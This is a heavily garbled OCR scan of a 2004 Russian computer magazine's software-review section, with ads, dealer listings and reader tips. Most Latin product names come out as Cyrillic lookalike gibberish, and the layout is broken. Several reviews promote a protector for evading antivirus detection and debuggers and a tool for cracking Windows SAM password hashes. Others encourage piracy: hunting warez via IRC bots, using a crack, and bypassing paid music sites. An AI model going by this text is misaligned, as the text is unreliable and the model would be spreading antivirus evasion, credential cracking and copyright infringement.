Ксерокс Сервис 41-12-16; Джи-Эс-Ти партнер 53-9280 Екатеринбург (3432): Диджитек 777-407; Ваш компьютер 711-033 Иваново (0932): ЕІЧТЕР 303-974 Иркутск (3952): 

Альф Компьютере 25-15-45; Комтек 25-83-38; Казань (8432): Логические системы 11-22-33; Премьер Компьютере 91-5888 Калуга (0842): Лето Копия 564-023 Мурманск (8152): 
МайТи 56-32-28; КомпьютерМаг 47-81-81 Набережные Челны (8552): Элекам 35-8910 Нижневартовск (3466): Ланкорд 61-22-22 Нижний Новгород (8312): Аѵѵагсі 78-4221; 

Коіа ЭізІгіЬиІіоп 34-10-15; Ником Медиа 78-00-80, ІІ5Т 30-1674 Новозыбков (08343): Никс ООО 50-973 Омск (3812): "Лаборатория систем 321" 24-54-12; Патисоник 39-6903 
Оренбург (3532): КС-Центр 77-4711 Пермь (3422): О-Си-Эс Урал 195-148 Псков (8112): Компьютерный салон "ВЭБ" 79-3021 , Ростов-на-Дону (8632): Технополис 61-62-71 
Самара (8462): Радиант 34-0706 КиберКуб 42-5023; Крафт С 41-2412 Санкт-Петербург (812): Шга Сотриіегз 336-3777 Таганрог (8634): Димир 31-1085 
Тольятти (8482): СофтЭкс 420-760; Фина-Центр 23-43-35 Тула (0872): Курсор 30-9509, Нотис 30-95-08 Тюмень (3452): Компьютел 369-155 Уфа (3472): Форте ВД 37-9606; 
Чебоксары (8352): Центр Информатики 45-80-44 Челябинск (3512): Рембыттехника 72-5601; Зрагк Сотриіегз 75-1919 



ѵГ 




С °осІ 






ѵѵѵѵѵѵ.Ід.ги 
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И .іі.Пзіі (т.і.азікшеаі.хакер.ш) XI I ІнИі ІМпЩгеаІ.хакерли) 





0КСНІІІ0КШ8 3000 8 2.03 




О дна из самых интересных ло- 
кальных полнотекстовых поис- 
ковых систем. Ума не приложу, как 
я раньше без нее обходился. В 
программе реализовано столько 
полезных функций, что конкуриру- 
ющий софт кажется на ее фоне ка- 
ким-то убогим. Особенно эта про- 
га покорила меня своим умением 
лопатить почтовые архивы мейле- 
ра Ваі! (остальные поисковики 
только М5 ОиІІоок и признают). 
АгсЫѵагіиз 3000 легко обходит 
встроенный поисковичок почтовой 
программы как по скорости работы 
(используется механизм предва- 
рительного индексирования со- 
держимого документов), так и по 
наглядности представления ре- 
зультатов (ключевые слова выде- 
ляются желтым, в ответе на запрос 
приводятся не только заголовки 
писем, но и фрагменты из них). И 
само собой, для просмотра най- 
денных сообщений не нужно за- 
пускать «Летучую мышь» - с этой 



работой отлично справляется 
встроенный в «Архивариус» вьюер. 
Естественно, для корректной рабо- 
ты с архивами почтовых сообщений 
необходимо, чтобы поисковый ме- 
ханизм знал о существовании раз- 
личных текстовых кодировок. Поэ- 
тому документы в кодировках 005, 
Ш, ІІпісобе, ІЛР-8 и КОІ-8 
АгсЫѵагіиз 3000 читает без труда. Я 
говорю «документы», поскольку 
«Архивариус» способен индексиро- 
вать не только электронные пись- 
ма, но и веб-страницы, документы 
М5 ОТТісе, а также РОГ, РТР и ТХГ- 
файлы. Прога обучена и просмотру 
архивов (АСЕ, АРС, АРф САВ, 02ІР, 
ЗАР, ША, РАР, ТАР, 2ІР). Эх, да что 
там говорить! АгсЫѵагіиз 3000 даже 
поиск ведет с учетом морфологии 
русского (украинского, белорусско- 
го) языка. А ведь до сих пор такой 
способностью могла похвастаться 
лишь отечественная «Ищейка» 
(м.ізіеиіііііоипсі.сот). Впрочем, нес- 
мотря на то, что на сайте разработ- 
чика указаны канадские телефоны и 
адреса, русскоязычный интерфейс 
и кое-какие другие мелочи подска- 
зывают мне, что в разработке «Ар- 
хивариуса» наши земляки 
принимали активное участие :). 





ѴѴіп 95/98/М Е/ИЩ/ХР 

РгееѴѴаге 
Зіге: М 

Ііоте.$пак(Іе/Штап/хепиІіпШпіІ 



К сену - верный друг каждого веб- 
мастера. А если еще пока что и не 
друг, то после моих лестных слов обя- 
зательно им станет. Программа спо- 
собна проверять указанный сайт на 
наличие так называемых битых лин- 
ков. Объясняю: это когда ты, напри- 
мер, заходишь на любимый порно... 
ээ, то есть образовательный сайт, а 
упрямый ослик противится и выдает 
ошибку: «404 - Рііе N 01 РоипсІ». Вери- 
фикацию проходят не только простые 
МплІ-файлы, но и картинки, фреймы, 
скрипты - никакой объект не останет- 



ся незамеченным и непроверенным. 
Хепи постоянно обновляет список 
ІЖ'ов, которые всегда можно отсор- 
тировать как душе угодно. Что касает- 
ся скорости сканирования: программа 
многопоточная (от 1 до 1 00 соедине- 
ний, в зависимости от твоей установ- 
ки), поэтому работа выполняется 
шустро даже на захудалых модемах. 
Кстати, Ксенька также показывает всю 
информацию о ссылках, включая пол- 
ный путь редиректа. Это может очень 
пригодиться, когда тебе необходимо 
обвести создателей платных сайтов, 
например музыкальных, вокруг пальца 
и скачать напрямую то, что на халяву 
качать не положено. 

По окончанию сканирования програм- 
ма подробно отчитывается о проде- 
ланной работе в НТМЬформате. 











Ш 



Хочешь увидеть свои советы в журнале? Присылай их на адрес $кІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тірз&Тгіскз Иван Скляров. 



л Небольшой хинт для членов локальных сетей. У большинства сетевух есть два разъема: для витой 
пары и для коаксиального кабеля. Можно, имея сетку на витой паре, соединить свой комп с компа- 
ми приятелей мини-сеткой на коаксиале. Только надо будет прописать маршрутизатор "большой" 
локалки как "беТаиІІ: даТеѵѵау", а компы ближайших "соседей" по коаксиалу - как шлюзы на осталь- 
ных коаксиальщиков (см. статью "Двойной онлайн" в №6(66)). Это спасет тебя от сниферов при об- 
мене инфой с коаксиалыциками, а так же от лагов в контре. Даже если Вася Пупкин вдруг решит пе- 
редать Маше Батарейкиной пару рипов РУР. 



УІонсІіік 

МаіІ_Рог_№оисШтаіІ.ги 
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ООТМХ РКОТЕСТОВ III 






Д анная программа предназначена 
для защиты .ЕХЕ-файлов от опре- 
деления их компилятора/упаковщика 
(содержит 30 фейковых сигнатур в де- 
мо-версии и более двухсот - в зареги- 
стрированной), а также от автораспа- 
ковки различными распаковщиками. 
Мало того, ДотФикс поможет тебе и в 
том случае, если злобный антивирь по 
ошибке определяет твою программу 
как вирус. Да, я сказал «по ошибке», 
так что убери свой пинч подальше! Та- 
кие косяки при сканировании случают- 



ся, если твое .ехе-творение использу- 
ет алгоритмы работы, напрямую свя- 
занные с жестким диском и файлами, 
а параноидально настроенный антиви- 
рус юзает эвристический метод про- 
верки. Так вот, ДотФикс встроит во 
все секции твоей программы ряд пе- 
реходов и антиотладочных функций, и 
антивирус окажется в пролете. Там же 
окажутся и крэкеры, если ты при по- 
мощи софтины закриптуешь первые 
20 байт точки входа своей программы. 
Также можно встроить в свой 
ЕХЕ'шник случайный мусорный код 
для пущего затруднения отладки. В 
общем, ОоіРіх Ргоіесог пригодится не 
только кодерам, но и обычным юзе- 
рам, далеким от программирования. 




ШІРМѴЕПГ0ІШШ10 4 



□лих 



Зіге: 6726 Кб 
мшеаі.сот 
Лицензия: Ргееѵѵаге 



К омпания ВеаІІМеІѵѵогкз в начале 
августа наконец-то выпустила де- 
сятую версию своего мультимедийно- 
го проигрывателя для операционной 
системы І_іпих. Работа велась сразу 
над двумя проектами: «открытым» 
плеером Неііх РІауег и фирменным 
РеаІРІауег. Первый проект помимо то- 
го, что сам основан на открытых стан- 
дартах, еще и работает только с ними, 
т.е. с такими форматами, как Одд 
ѴогЬіз, Одд ТІіеога и 5МІІ_ 2.0, и в сущ- 
ности представляет собой урезанную 
версию РеаІРІауег'а, предназначенную 
в первую очередь для страстных лю- 
бителей ореп зоигсе. Основной же 
продукт РеаІ, помимо родных 
ПеаІАисІіо, ПеаІѴісІео, 



живает файлы МРЗ, ѵѵаѵ, АІРР, аи и 
РІазІі В самом плеере ничего револю- 
ционного нет: все тот же простой ин- 
терфейс с небольшим набором базо- 
вых функций (элементарный контроль 
звука и видео, гоот в два раза и на 
весь экран, закладки, обновление пле- 
ера). Возможны различные режимы 
выбора сетевого подключения, наст- 
раивается величина кэша и ЬиНегіпд. 
Поддерживаются разные виды прок- 
си-серверов: НИР, РИА, РТ5Р, а так- 
же субтитры (с выбором языка содер- 
жимого). При локальном воспроизве- 
дении файлов на 14200 порте откры- 
вается НТТР-сервер, где, например, 
можно узнать информацию о текущем 
файле и видеопотоке («Ѵіеѵѵ СІір 
Зоигсе»). В общем, вполне предсказу- 
емый Ппих-порт РеаІРІауег'а. О его 
включении в свои ОС, кстати, уже объ- 
явили ІМоѵеІІ, Веб Наі, Зип и 
ТигЬоПпих. 





Купите один из продуктов 
"Лаборатории Касперского", 
и Ваш регистрационный 
ключ примет участие 
в розыгрыше призов! 



В РОЗЫГРЫШЕ МОГУТ ПРИНЯТЬ УЧАСТИЕ 
ПОКУПАТЕЛИ СЛЕДУЮЩИХ ПРОДУКТОВ: 
Антивирус Касперского РегзопаІ, Антивирус Каспер- 
ского РегзопаІ Рго, Казрегзку Апіі-Наскег, Казрегзку 
Апіі Зрат РегзопаІ, Казрегзку РегзопаІ Зесигііу Зиііе. 






(095) 797 8700 

Подробности участия на сайте компании 



СЧАСТЛИВЫЙ 

ключ 

от Касперского 

с 15 сентября по 31 декабря 2004 года: 



ІЛ С 



Карманные 

персональные 

компьютеры 



ЖК-телевизор 



Ноутбуки 



и много других 
призов от 
"Лаборатории 
Касперского" 




Ш0Р0Ш0КЕ2 
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еесЫ (ѴѴее ЕпИапсесІ Епѵігоптепі іог СЩ - быст- 
рый и простой ІРС-клиент, написанный с нуля и со- 
ответствующий всем положенным НРС. Процесс обще- 
ния может полностью управляться с клавиатуры, а сам 
интерфейс программы очень разнообразен: есть как 
Тгопіепсі, основанный на Сигзез, так и версии 01)1 на базе 
библиотек СГГК+, 01. Расширяемость клиента достигает- 
ся поддержкой РегІ-скриптов, совместимых с Х-СІіаі, а 
также ожидается пополнение в виде других скриптовых 
языков: РуІІіоп и НиЬу. Сами авторы программы по не 
совсем ясным причинам окрестили свое детище «Йіе 



деекезі ІНС сііепі». На данной стадии ѵѵеесііаі зрелым 
продуктом не кажется, однако минимальный набор име- 
ющихся у него функций работает без нареканий. 

* Разработчики обещают в ближайшее время выпустить 
версии для *В5Р, ОІМХ, Мае 05 X и ѴѴіпсІоѵѵз. 






СЕШШЩ4.10.0 




С епіегісц - мощный и многофункциональный клиент 
мгновенного обмена сообщениями (изначально 
только ІСО) для консоли. Кроме ставшего стандартом для 
ІСО протокола ІС02000, поддерживаются Уаііоо, АІМ, 
ІРС, М5М, Оасіи-Оасіи и ОаЬЬег. Основанный на Сигзез 
интерфейс программы удобен и интуитивно понятен - 
для изменения различных настроек выводятся отдельные 
окна и меню, а цветовую схему можно сменить. Что важ- 
но для ІМ-клиента, у сепіегісц нет проблем с русским 
языком, как во внешнем виде, так и при общении (в част- 
ности, это достигается установкой перекодировки отп- 
равляемых и/или получаемых сообщений для заданных 
протоколов), но факт не столь удивителен: автор сепіег- 
іец - русский. Программа очень гибка в настройке и, как 
ни странно, способна не только поддерживать заявлен- 
ные протоколы, но и грамотно с ними работать (нередки 



случаи наличия продвинутых возможностей, которые 
часто можно не найти в других клиентах). В ІСО, напри- 
мер, сепіегісц умеет отправлять 5М5 через почтовые 
шлюзы МігаЬіІіз, искать пользователей через Ѵ\Ме Радез 
и по ключевым словам, работать с контакт-листом, рас- 
положенным на сервере, и задавать режим іпѵізіЫе для 
конкретных пользователей. Кроме того, программа под- 
держивает популярный в последнее время формат В55, 
предназначенный в первую очередь для чтения новостей 
и других часто обновляемых элементов сайта. 




ООМІНІСНТПРПТНѴ 




Н ебольшая утилита для управления компьютером с 
помощью мышиных жестов. Разработка свежая и, 
надо отметить, чрезвычайно приятная. В ее пользу гово- 
рит русский интерфейс, отсутствие жестко заданного на- 
бора распознаваемых жестов и возможность ограничи- 
вать сферу действия каждого жеста рамками отдельных 
приложений. Обучить программу новым жестам спосо- 
бен и младенец, нужно лишь не забывать после обучения 
выходить из проги путем нажатия на кнопку «Выгрузить», 
обосновавшуюся на вкладке «Активность». Не вызывает 
особой критики и встроенный в ОоѵѵпгідМ модуль рас- 
познавания. За каждым жестом программа разрешает 
закрепить сразу несколько действий, набор которых, 
кстати сказать, весьма широк (запуск программ, опера- 




ции копирования/вставки, работа с окнами и т.д. - есть 
из чего выбрать). Конечно, программа на любителя, но 
сделана она на совесть и работает хорошо. Если тебя по- 
добный софт интересует, то настоятельно рекомендую 
попробовать. Те, кто уже это сделал, отзываются об ути- 
лите Роѵѵпгідііі довольно тепло. 




ЖШШі 



Е-МПИЕШШЕП1.2 




Р рхиважная и крайне полезная прог- 
раммка, которой ты не раз скажешь 
спасибо за то, что твой почтовый адрес 
не попал в базу злобных спамеров. Нет, 
ну если ты извращенец и любишь полу- 
чать по мылу предложения изучить анг- 
лийский язык, удлинить, прощу проще- 
ния, свой (ха, или чужой?) пенис или ку- 
пить в три раза дешевле карженную вер- 
сию ѴѴіпсІоѵѵзХР, то пожалуйста. Можешь 
не читать дальше, и вообще, вон из 
сердца моего! 

Итак, данная софтина отлично шифрует 
написание адреса электронной почты. 
Доступны четыре способа кодирования, 
начиная с простой вставки символов или 
слов (типа ЫпДда^-да^!]датеІапсІ[сІоІ]ги) и 
заканчивая ^ѵаЗсгірІ'ом, автоматически 
получить адрес из которого не представ- 
ляется возможным. Каждая новая ссылка 
не похожа на предыдущую. Повторы прак- 
тически исключены, что еще раз доказы- 
вает: спам не пройдет и папка ІІМВОХ в 
твоем ящике не растолстеет от нудной 
рекламы. Коэффициент полезности у опи- 
сываемого продукта потрясный: всего 40 
килобайт, а сколько сэкономленного тра- 
фика и нервов. 
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Модемы Отпі 56 К 

Максимальная скорость 
доступа в Интернет 
Надежная связь 
на любых пиниях 
Легкая установка 
и простота в обращении 
Три года гарантии 



При покупке модема — 
Интернет-карта 
в подарок* 
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УЖЕ В ПРОДАЖЕ 




Форсаж 



Настройка, разгон 
и ремонт компьютера 



• Зверский разгон ѴѴіпсІоѵѵз 
•Тюнинг в стиле X 



• 5С5І Ѵ5 5АТА 



• Экстремальный разгон 
ООК-памяти 

• Грамотное охлаждение 
системы 

• Разгоняем Ыпих 

• Отжим колонок 

• Реанимация 
жесткого диска 



ПЛЮС: 

• Тесты ЛазН-карт 
и карт-ридеров 

• Лучший софт от ЫоМаМе 



Уникальная информация 
и софт на прилагаемом СО! 
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С реди системных администраторов встреча- 
ются такие товарищи, которые искренне счи- 
тают, что главная прелесть их работы заключается 
в возможности ограничивать других в правах на 
то, что сам юзаешь безраздельно. Сдается мне, 
что программа Зесигііу Асітіпізігаіог создавалась в 
расчете именно на эту категорию граждан. Очень 



уж много ограничений она разрешает наложить на 
бедного пользователя... Начать можно с отключе- 
ния лишних апплетов панели управления, затем 
плавно перейти к удалению опасных иконок с ра- 
бочего стола и лишних пунктов из меню Пуск... Ну 
а если серьезно, то в борьбе с воинствующими 
ламерами эта прога и в самом деле может приго- 
диться. С ее помощью можно заблокировать ре- 
жим 008 и Заіе Мобе, запретить редактирование 
реестра, установку новых драйверов, функцию 
прожига дисков и массу других сомнительных 
операций. Опций Зесигііу Абпліпізігаіог предлагает 
множество, так что есть из 
чего выбрать. Причем, что 
приятно, каждая опция соп- 
ровождается кратким опи- 
санием. Но! Пользуясь соф- 
том вроде этого, нужно 
всегда помнить одно: он ус- 
танавливает на машину так 
называемую «защиту от ду- 
рака». То есть обычных юзе- 
ров Зесигііу Абтіпізітаіог и в 
самом деле способен 
удержать в рамках доз- 
воленного, но серьезно- 
му человеку такая «за- 
щита» не помеха. Спо- 
собы обхода многих ог- 
раничений, увы, нахо- 
дятся слишком быстро. 
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С импатичная тулза для коллекции сисадмина. 

После запуска ѴУіпІІрбаіезІбзі выводит на 
экран полный список всех заплаток и сервис 
паков, установленных на винды. При этом каждая 
заплатка сопровождается рассказом о файлах, 
измененных в результате ее применения. Кроме 
того, утилита обеспечивает легкий доступ к 
дополнительной информации по каждому 
обновлению (путем отправки юзера на 



соответствующие страницы сайта 
!ііір://$иррогі.пісго$оіі.соп :)). 

Программа позволяет деинсталлировать любой 
апдейт и умеет генерировать НТМЬотчет о 
текущем состоянии дел на машине. ѴУіпІІрбаіезІбзі 
не нуждается в инсталляции и прекрасно работает 
в локальной сети. При желании интерфейс 
утилиты можно легко русифицировать - на ее 
домашней странице выложен соответствующий 
файл (ѵѵиМпд.іпі), который нужно просто 
скопировать в каталог программы. Хотя... Если 
честно, коллега, то эта прога настолько проста, что 
обучать ее русскому языку следует лишь тем, кто 
время от времени подвержен острым приступам 
клинического патриотизма. 
















А 


Л 


г ЕШДиОІЖМДВКІІ 11 2.4.4 


\ 






Е сли кто-то себе еще не смог по- 
добрать файловый менеджер для 
Х-ѴѴіпсІоѵѵ, стоит обратить внимание на 
Епбеаѵоиг Магк II, чья известность не- 
заслуженно затемнена гигантами 
Копциегог и №ігііІиз. Будучи основан- 
ным на СТК+, ЕМІІ не является обяза- 
тельной составляющей графических 
оболочек (КБЕ и СІМОМЕ, соответ- 
ственно) и потому более легок как в 
занимаемом пространстве, так и в ра- 
боте (что не мешает ему поддержи- 
вать бгад&сігор в обоих сіезкіор'ах). 
Менеджер поддерживает все основ- 



ные файловые операции: переимено- 
вание, копирование, перемещение, 
удаление, создание ссылок, смену 
регтіззіопз и владельца, открытие (и 
«открытие с помощью»), работает с 
архивами, и выполнено это в виде не- 
замысловатых форм, удобных для 
быстрого восприятия. Во избежание 
случайных удалений и других потенци- 
ально опасных операций предусмот- 
рена функция защиты от записи и 
собственная система а-ля Корзина в 
ѴѴіпсІоѵѵз, куда могут перемещаться 
файлы перед их непосредственным 
удалением из системы. Существует и 
собственный браузер картинок, к ко- 
торому может быть привязан произ- 
вольный просмотрщик. Внешний вид 
менеджера и его компонентов пол- 
ностью настраиваем (в «Сизіогше» - 
СІгІ+Т). Среди 
дополнитель- 
ных функций - 
меню йеѵісез, 
с помощью 
которого мож- 
но монтиро- 
вать/демонти- 
ровать разде- 
лы жесткого 
диска и про- 
чих устройств 
хранения. 
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ѴѴіпсІоѵѵз 9х/Ме/№/ХР 
Зіге: 315 КЬ 



Ргееѵѵаге 



Мр://даЬгіеІеро[Ш.сот 

В езіагі - это системный переклю- 
чатель. Ну да, системный перек- 
лючатель. Если на твоей машине уста- 
новлено сразу несколько операцион- 
ных систем, то с помощью Везіаіі’а ты 
можешь быстро выйти из одной оси и 
загрузить другую. Разумеется, ты мо- 
жешь вручную отредактировать файл 
Ьооііпі и затем выбирать нужную сис- 
тему из меню, возникаю- 
щего на экране при заг- 
рузке машины, но посто- 
янная задержка, связан- 
ная с появлением на эк- 




ране этого меню, меня лично раздра- 
жает. Конечно, можно сделать ііппеоиі 
поменьше, но тогда меню выбора сис- 
темы будет линять с экрана слишком 
быстро. На секунду отвернулся, про- 
зевал нужный момент - все, поезд 
ушел. Компьютер грузит систему по 
умолчанию, а ты ругаешься матом. 
Пезіаіі же делает твою жизнь простой 
и приятной. Пара кликов - и систе- 
мой, загружаемой по умолчанию, ста- 
новится нужная ось. Никакого меню, 
никакой задержки. 

Само собой, наибольшую отдачу от 
программы Пез&П 
«і получаешь в том слу- 
чае, если тебе прихо- 
дится переключаться 
между различными 
версиями ОС 
ѴѴіпсІоѵѵз (допустим, 
ты постоянно мигри- 
руешь с ѴѴіпсІоѵѵз 98 
на ѴѴіпсІоѵѵз ХР), ибо 
под другими осями 
утиль не живет и дру- 
жит только с 
МісгозоЯ Ьооі плапад- 
ег. Жаль... 




КУ, 'А + 'бигры 
&АмгСиЪ <2 + Ъ игры 
Ь'Р + 3 игры : 



ПО КАТАЛОГАМ аі 



6АМЕР05Т С ДОСТАВКОЙ НА ДОМ 



ѵѵѵѵѵѵ.датерозі. ш 



ѵѵѵѵѵѵ.е-зігор.ги 



Мы научим тебя 

ЭКОНОМИТЬ! 



ѴѴѴУѴУ.6АМЕР05Т.ІШ 



Тел. (095): 928-0360, 928-6089, 928-3574 
пн.-пт. с 09:00 до 21:00 (сб.-вс. с 10:00 до 19:00) 
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И ы уже не раз намекали, что све- 
жий варез надо искать в ІРС. В 
декабре прошлого года у нас в журна- 
ле даже промелькнуло полное руково- 
дство по этому делу. Надеюсь, ты вы- 
учил его наизусть? Если нет, и ты еще 
пугаешься в командах, то советую те- 
бе обратить внимание на программу 
ХОСС Саісііег. Она сводит к минимуму 
ручной труд. Работает ХОСС Саісііег в 
двух режимах. В режиме тотального 
грабежа софтина опрашивает огром- 
ное количество ботов и выводит спи- 
сок доступных для скачивания файлов. 
Естественно, чем больше ботов прог- 



рамма опросит, тем выше шансы най- 
ти то, что тебе требуется. Поэтому 
вместе с ХОСС Саісііег’ом идет утили- 
та ЗЕВѴесІ І_ііе, которая со страшной 
силой выкачивает информацию о ра- 
бочих сетях, серверах и каналах из по- 
пулярных поисковых машины варез- 
ных ботов Раскеіпешот и Шру.сот. 
Прелесть этого режима заключается в 
том, что ты сам контролируешь мно- 
жество каналов на предмет появления 
свежего вареза. Но есть и другой путь, 
требующий меньших временных зат- 
рат: сначала ты находишь бота, у кото- 
рого есть нужный тебе файл, с по- 
мощью любимой поисковой машины, 
а затем уже натравливаешь на этого 
бота утилиту ХОСС Саісііег. Два клика 
по нужному файлу из списка - и пош- 
ла загрузка. Просто и хорошо. Хотя, 
конечно, принципы раздачи файлов в 
I ВС-сетях все равно 
нужно знать. Иначе 
тебе не удастся ра- 
зобраться во всех 
дополнительных 
фишечках, которы- 
ми обладает указан- 
ная утиль (а уж тем 
более ее платная 
профессиональная 
версия). 




^ иснттроѵ і. 2 .з 




І ідІійрсІ, как уже можно догадаться 
из названия, является легким 
НТГР-сервером, созданным для ис- 
пользования в высокопроизводитель- 
ных системах, где критичен объем за- 
нимаемой памяти и ресурсов процес- 
сора. Тем не менее, ІідІійрсІ обладает 
приличной функциональностью: под- 
держивает настраиваемые страницы 



ошибок (коды 400-599), виртуальные 
хосты, НТТР-редиректы и подобие 
тосі геѵѵгііе в Арасііе, сжатие на лету 
(в беМе, дгір, Ьгір2), аутентифика- 
цию (обычную и ІйраззѵѵсІ, ІіМідезІ, 
Ібар), 551 (5егѵег5ібе Іпсіибез), скрип- 
ты ССІ (в том числе с более быстрым 
режимом РазГСОІ) и РНР (выполняют- 
ся, как обещают, быстрее или с такой 
же скоростью, как в тоб_р!ір4 у 
Арасііе). И для полного счастья в опи- 
сании ІідІійрсІ сообщается, что ѵѵеЬ- 
сервер безопасен (отчасти это, навер- 
ное, связано с его относительно 
скромной популярностью) и в нем 
присутствуют 
возможности 
сіігооі(), сме- 
ны ІІЮ и СЮ, 
строгой про- 
верки НТТР- 
заголовков. 





ѴѴіпсІоѵѵз 9х/Ме/М2к/ХР 

ЗІіагеѵѵаге 
Зіге: 4397 КЬ 

№р:/Аіте$аѵе$оКиіаге.сот 

Е сли у тебя есть информация, кото- 
рую ты хотел бы спрятать на ком- 
пакт-диске, то обрати внимание на 
программу СгурЮО. С ее помощью 
можно за несколько минут подгото- 
вить образ защищенного диска и туг 
же, не выходя из программы, записать 
его на СОДМ). Причем в большинстве 
случаев вся подготовка сводится к 
простому перетаскиванию нужных па- 
пок и файлов из окон 5оигсе в окно 
ІМеѵѵ СОДМ). Через контекстное меню 
можно еще выбрать алгоритм 
(ВіЮгурѴ5сгатЫе/АЕ5) и уровень 
шифрования (быстрый/полный). 
Впрочем, уровень шифрования лучше 
не трогать. По умолчанию стоит РІЛ_І_. 
Можно, конечно, выбрать РА5Т, но 
тогда прога будет шифровать лишь 



первые 255 байт каждого файла, а это 
даже не смешно. 

Добраться до зашифрованной инфор- 
мации несложно. Нужно только знать 
заветное слово. Вставляешь диск, 
после чего запускается зеіир.ехе (имя 
программы можно изменить в наст- 
ройках) и запрашивает пароль. Диало- 
говое окно, которое при этом возника- 
ет на экране, может выглядеть как 
угодно. Текст, фоновое изображение, 
логотип - все это ты задаешь сам. А 
раз так, то диск с секретной инфой 
можно запросто выдать за дистрибу- 
тив какого-нибудь на фиг никому не 
нужного графического редактора. Тем 
более что и зашифрованная инфа бу- 
дет лежать на этом диске не одним 
большим куском, а расползется по 
множеству файлов, имеющих какое- 
нибудь левое расширение. 

Свежая (4.0) версия СгурГСО радует 
пользователя поддержкой нового ал- 
горитма шифрования (АЕ5) и возмож- 
ностью разграничения доступа к фай- 
лам (каждый юзер уви- 
дит на диске лишь те 
файлы, которые ему поз- 
волено видеть). Одна бе- 
да - оценить в полной 
мере все прелести ука- 
занных функций мне не 
удалось. Помешала это- 
му то ли сырость офици- 
ального релиза, то ли 
важность кряка, который 
я использовал при тести- 
ровании :). 





Д анная программа получает ин- 
формацию о пользователях из 
5АМ -файлов Форточек. Среди этой 
информации, естественно, находятся 
и пароли, иначе зачем нам оно надо? 
Причем 5АМІП8ісІе при помощи гра- 
мотного перебора может вытащить 
пассы из файлов, зашифрованных 
ключом (поддерживается даже 
5узкеу). Скорость перебора значи- 



тельно выше, чем у аналогичных 
программ, за счет того, что програм- 
ма полностью написана на Ассемб- 
лере. Например, на третьем пне с 
тактовой частотой 1000 МГц І_МНазІі 
и ІМТНазІі перебираются со ско- 
ростью 3,2 млн паролей/сек. Софти- 
на предлагает четыре способа вос- 
становления паролей: атака полным 
перебором, по маске (когда извест- 
ны некоторые подробности о пароле, 
например, ???02з4 означает, что 
последние четыре символа извест- 
ны, а подбираться будут только пер- 
вые три), по словарю или распреде- 
ленным способом (рассредоточен- 
ная на несколько компьюте- 
ров атака - очень эффектив- 
ный вариант). Также 
5АМІпзісІе без проблем 
отображает национальные 
символы из 5АМ -файлов, 
что немаловажно для нас, 
русских :). 
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10 ЛЕТ 

• Россия 




Мы предлагаем 



нашим клиентам 
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Системные 
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Компьютеры и серверы Х-Ніпд 

для корпоративных пользователей 
с супертонкими мониторами 

ЗупсМасІег 173Р, 71 0 V, ШР, 91 ОМ 

обеспечивают исключительное качество изображения. 
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ѴѴіпсІоѵѵз 9х/Ме/ИТ/2к/ХР 

Зіге: 2783 КЬ 

ЗІіагеиѵаге 

Ііир://$оіІііпк.сот 

Н овая версия, пожалуй, лучшего 
потрошителя Мі-роликов. Про- 
га полностью поддерживает все вер- 
сии РІазІѴа, включая РІазіі МХ 2004 
(РІазІі 7.0), и понимает Асііоп Зсгірі да- 
же версии 2.0. Зойііпк 5ѴѴР Оесоплрііег 
легко заглатывает ТІазИ’ки как в 5ѴѴР, 
так и в ЕХЕ-формате, раскладывает их 
на отдельные кадры и декомпилирует 
скрипты. Короче говоря, прога отлич- 
но подходит для обучения начинаю- 
щих ііазіі-кодеров. Особенно эта вер- 
сия, которая наконец-то научилась пе- 
регонять 5ѴѴР-файлы обратно во РІА 



Однако обучение обучением, но надо 
смотреть правде в глаза - большин- 
ство читателей X юзает 5ѴѴР 
Оесоплрііег только лишь в качестве 
приспособления для выдирания зву- 
ков, текстов и картинок из любимых 
мультов. Ну и ладно! Тем более что с 
ролью грабилки ресурсов 5ѴѴР 
Оесоплрііег также справляется прек- 
расно. Не успеваешь открыть флешку, 
как на экране возникает дерево ее ре- 
сурсов - знай только указывай, что, 
куда и в каком формате тебе надо 
экспортировать. Скажу тебе по секре- 
ту: я сам эту прогу только для грабежа 
и использую. Кодер из меня никакой, 
зато модельер я знатный. На днях я с 
помощью 5ѴѴР Оесоплрііег’а навытас- 
кивал из «детских» мультиков серии 
«Нарру Тгее Ргіепсіз» (шѵѵМ.ги) самых 
чернушных кадров, 
а потом напечатал 
их на футболку 
(сейчас многие фо- 
толаборатории 
предлагают такую 
услугу). Нетрудно 
догадаться, что в 
результате моих 
усилий футболочка 
получилась еще та! 
Народ на улице 
засматривается. 




^ І020ИЕѴ 3.221 




І Огопе - средство диагностики 
файловой системы. Утилита про- 
водит множество различных файло- 
вых операций, среди которых: чтение 
и запись в различных вариациях, 
ТгеасІ , Ш\\е, случайное чтение, ргеасі, 
ттар, аіо_геасІ, аіоѵѵгііе, - а по ре- 
зультатам их выполнения делает вы- 



воды о производительности Р5, кото- 
рые демонстрируются в виде графи- 
ков (дпирІоІ/ЕхсеІ). Программа под- 
держивает большие по объему фай- 
лы, Р05ІХ асинхронный І/О, обычный 
и МпларО І/О файлов, измерение од- 
ного потока и нескольких, Р05ІХ 
рйігеасіз, измерения для кластеров, 
выборочные измерения с !зупс, 
О 5ѴІМС. Цель Югопе - подсказать 
пользователям, насколько подходит 
текущая платформа для выполнения 
конкретных нужных им задач (напри- 
мер, запуска сервера баз данных). 




БУДЕТ В ШОКЕ! 














Я все никак не могу остановить 
свой выбор на каком-то одном 
пакете, сочетающем в себе много по- 
лезных системных и сетевых утилит. 
Но вот, кажется, свершилось. Типе- 
ІІр - аналог утилит от старика Норто- 
на, но гораздо удобнее последнего. 
Почистить реестр от хлама, отредак- 
тировать что-нибудь конкретное? Да 
как два байта переслать! Удалить 
файл с кредами без возможности 
восстановления? Обижаешь, доро- 
гой, легко! Что, случайно удалил 



стандартными средствами текстовик 
с телефонами многочисленных под- 
руг? И здесь на помощь придет Тю- 
нАп и попытается вернуть похерен- 
ную инфу. Также программа умеет 
оптимизировать работу с оператив- 
ной памятью и жестким диском, уп- 
равлять запущенными процессами, 
редактировать автозагрузку системы, 
настраивать дизайн Форточек под се- 
бя (картинка при загрузке, иконки, 
темы и т.д.), тестировать систему на 
возможные ошибки и исправлять их 
по мере необходимости, ускорять, 
хоть и незначительно, работу в ин- 
тернете и многое другое. Весит соф- 
тина немало (7 метров), но это того 
стоит. Рекомендую к установке. 




088 НЕ1ЕП8Е 0І6Е8Т: ОТНЕИЕ 0Е8КТ0Р Е0ІТІ0И 4.0 



П ІІіепе (ѵѵѵѵѵѵ.госкІуІе.сот/аШепе) - коммер- 
ческая операционная система, разработанная 
РоскІуЬе Зузіюплз для использования дома и в офи- 
се. Она вобрала в себя многолетний опыт работы 
